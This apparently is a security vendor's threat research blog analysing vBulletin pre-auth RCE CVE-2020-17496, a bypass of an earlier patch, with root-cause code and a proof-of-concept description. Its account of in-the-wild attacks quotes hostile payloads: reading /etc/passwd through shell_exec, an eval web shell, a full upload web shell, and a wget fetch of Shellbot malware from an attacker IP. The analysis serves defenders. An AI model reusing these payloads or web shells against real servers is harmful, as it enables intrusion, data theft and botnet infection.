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Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites.
Recently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows attackers to send a crafted HTTP request with a specified template name and malicious PHP code, and leads to remote code execution. More than 100,000 sites are built on vBulletin, including the forums of major enterprises and organizations, so it’s imperative to patch immediately.
In this blog, we provide details on the bypass of the patch of the vulnerability, proof of concept code (PoC) to demonstrate the vulnerability and information on attacks we have observed in the wild.
Palo Alto Networks customers are protected by the following services and products via Threat Prevention signatures and URL Filtering blocks the related C2 traffic.
Root Cause Analysis of the Vulnerability (CVE-2020-17496)
Template rendering is a functionality of vBulletin that can convert XML templates to PHP code and execute it. Beginning from version 5.0, vBulletin starts to accept Ajax requests for template rendering. The rendering is executed with a function staticRenderAjax. As shown in Figure 1, the values of parameters for this function are from $_REQUESTS, $_GET and $_POST. Thus, the template name and the related config which come from those parameters are user-controllable, which leads to the RCE vulnerability CVE-2019-16759.

When an attacker manipulates an Ajax request that contains template name widget_php and malicious code placed in the parameter widgetConfig[‘code’], the render engine will convert the XML template widget_php shown in Figure 2 to a string of PHP code, then execute the code by the eval function highlighted in Figure 3. Since the generated code has a line of vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'], the malicious code in the request will be executed.
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$final_rendered = '' . ''; if (empty($widgetConfig) AND !empty($widgetinstanceid)) { $final_rendered .= ' ' . ''; $widgetConfig = vB5_Template_Runtime::parseData('widget', 'fetchConfig', $widgetinstanceid); $final_rendered .= '' . ' '; } else { $final_rendered .= ''; } $final_rendered .= '' . ' ' . ''; if (!empty($widgetConfig)) { $final_rendered .= ' ' . ''; $widgetid = $widgetConfig['widgetid']; $final_rendered .= '' . ' ' . ''; $widgetinstanceid = $widgetConfig['widgetinstanceid']; $final_rendered .= '' . ' '; } else { $final_rendered .= ''; } $final_rendered .= '' . ' ' . vB5_Template_Runtime::includeTemplate('module_title',array('widgetConfig' => $widgetConfig, 'show_title_divider' => '1', 'can_use_sitebuilder' => $user['can_use_sitebuilder'])) . ' ' . ''; if (!empty($widgetConfig['code']) AND !vB::getDatastore()->getOption('disable_php_rendering')) { $final_rendered .= ' ' . '' . ' ' . vB5_Template_Runtime::evalPhp('' . $widgetConfig['code'] . '') . ' '; } else { $final_rendered .= ' ' . ''; if ($user['can_use_sitebuilder']) { $final_rendered .= ' ' . vB5_Template_Runtime::parsePhrase("click_edit_to_config_module") . ' '; } else { $final_rendered .= ''; } $final_rendered .= '' . ' '; } $final_rendered .= '' . ' '; |

Beginning from version 5.5.5, a fix for CVE-2019-16759 was introduced into the function callRender() as shown in Figure 4. It uses a disallow-list mechanism to check the template name. If the name is widget_php, the engine won’t render the requested template.

Another fix is that the evalPhp function will check the current template name. After the fix, widget_php is the only template that can be used to execute PHP code, as shown in Figure 5.

The fix makes widget_php the only template that can be utilized for PHP code execution, and meanwhile, restricts the user’s access to this template. However, in the latest bypass, we found that another template can be utilized to load this template. That template is widget_tabbedcontainer_tab_panel.

This template widget_tabbedcontainer_tab_panel shown in Figure 6, above, is a template that can be used to render multiple child templates. Rendering the template itself doesn’t directly lead to the remote code execution. However, the rendering of this template will trigger the rendering of other child templates.
The code below is the PHP code that is rendered from the widget_tabbedcontainer_tab_panel template in XML. After this code is generated, it will be executed.
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$final_rendered = '' . ''; $panel_id = '' . vB5_Template_Runtime::vBVar($id_prefix).vB5_Template_Runtime::vBVar($tab_num) . ''; $final_rendered .= '' . '' . '' . ' ' . ''; if (isset($subWidgets) AND (is_array($subWidgets) OR $subWidgets instanceof ArrayAccess)) { foreach ($subWidgets AS $subWidget) { $final_rendered .= ' ' . vB5_Template_Runtime::includeTemplate($subWidget['template'],array('widgetConfig' => $subWidget['config'], 'widgetinstanceid' => $subWidget['widgetinstanceid'], 'widgettitle' => $subWidget['title'], 'tabbedContainerSubModules' => $subWidget['tabbedContainerSubModules'], 'product' => $subWidget['product'])) . ' '; } }$final_rendered .= '' . '’; |
In the PHP code, it can be seen that the render engine will traverse the “subWidget” and its config from the $subWidgets and create a new template object, after which the rendering will generate its PHP code. In this case, if the string widget_php is assigned to variable subWidget and the malicious code is placed in the $widgetConfig['code'], the malicious code will be executed just like with CVE-2019-16759.
Proof of Concept
Based on our analysis, we can construct the exploit code to prove the functionality. The calling of the function callRender requires the POST HTTP method (according to Figure 7).

Figure 8 shows a compromised page that contains the result of the code phpinfo(); with the request information. Figures 9 and 10 show some other manipulated requests that have the same effect.
In the URL, the child template name widget_php and the malicious code phpinfo();exit(); are in the array subWidget as the first element. When the backend processes this URL, the malicious code will be executed.

Exploits in the Wild: CVE-2020-17496
We caught the first incident of CVE-2020-17496 exploitation on Aug. 10, 2020, and later found that exploitation attempts from different IP addresses are ongoing. Note that these are disparate attacks and not a coordinated effort by any particular attackers.
Scanning Activities
According to malicious traffic we captured, there are multiple source IPs running scans. These scans are trying to find vulnerable sites and collect that information, which is an early step of cyber attacks. The traffic is shown in Figures 11-15. These payloads try to execute system commands echo and id, which can give attackers knowledge of whether or not the targets are vulnerable according to the responses.

Sensitive File Reading
Some attackers are trying to exploit the vulnerability and read files on the server-side. The payload contains the PHP function shell_exec() for the execution of arbitrary system commands and a system command cat ../../../../../../../../../../etc/passwd to read the content of the /etc/passwd. The traffic is shown in Figure 15. Once the attack succeeds, sensitive information from the targets may be disclosed.

Writing Web Shell
Some attackers are exploiting the vulnerability to install a web shell.
Figure 16 shows that the exploit is trying to write a PHP-based web shell <?php @eval($_POST[“x”]);?> to the file conf.php on the web host directory with the PHP function file_put_content(). Once the attack succeeds, attackers can send their commands via HTTP POST request with the parameter x to the web shell and execute the commands on the server-side.

Figure 17 shows that the exploit is trying to download a PHP script onto the victim server. The webshell code is as below. The code provides an upload page for attackers to upload any files and conduct the follow-up steps of a cyber attack.
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<?php error_reporting(0); echo "Jasmine<br>"; echo"<font color=#ff0000>".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "<br>DisablePHP=".$disable_functions; print "\n"; echo"<br><form method=post enctype=multipart/form-data>"; echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; if($_POST["k"]==upload){ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"<b>".$_FILES["f"]["name"]; }else{ echo"<b>Gagal upload cok"; } } ?> |

Figure 18 shows that the exploit is trying to write base64 encoded PHP code into a file in the web host directory. The new page will lead to an arbitrary file upload entrypoint, allowing attackers to conduct the follow-up steps of a cyber attack.

Downloading Shellbot
Some attackers are utilizing the vulnerability to download a Perl-based script malware (Shellbot) with the PHP function shell_exec() for the execution of the system command wget from the address http://178[.]170[.]117[.]50/bot1 and run it. The payload can be seen in Figure 19.

Once the script is executed, it will connect to an IRC-based command-and-control (C2) server with the address of 66[.]7[.]149[.]161:6667, join the IRC channel #afk then keep responding to the PING from the server, as in the traffic shown in Figure 20. Once it receives the commands from the chat channel, it will execute the related code of port scanning, download files, execute system commands, start a flood attack, pop a shell to attackers and so on.

Downloading Sora
One exploit is found to download a Mirai variant (Sora) from the attacker’s server. However, the payload is ineffective as it uses the wrong HTTP method.

According to analysis of the samples, they spread themselves with different combinations of the exploits of CVE-2020-5902 (which would be ineffective, as the payload uses bash commands, whereas the exploit requires the injected commands to be specific CLI-compatible ones), CVE-2020-1937, CVE-2020-10173, CVE-2020-10987, Netgear R700 RCE, Netlink GPON Router 1.0.11 RCE and the vulnerability CVE-2020-17496 discussed in this blog.
There are multiple kinds of exploit attempts against vBulletin pre-auth RCE vulnerability CVE-2020-17496 being detected by our threat platform. As a widely used forum software package that has been running for a long time in the market, it has been identified as a prized target by attackers.
vBulletin released the patch to fix this vulnerability on Aug. 10, 2020. Applying the patch to the latest version will mitigate the risks, which is strongly advised.
Palo Alto Networks customers are protected by the following services and products:
- Threat Prevention Signature 59133 and 80671.
- URL Filtering blocks the related C2 traffic of the Shellbot.
Additional Resources
Indicators of Compromise
Shellbot Hash
Mirai Variant (Sora) Hashes
IP Addresses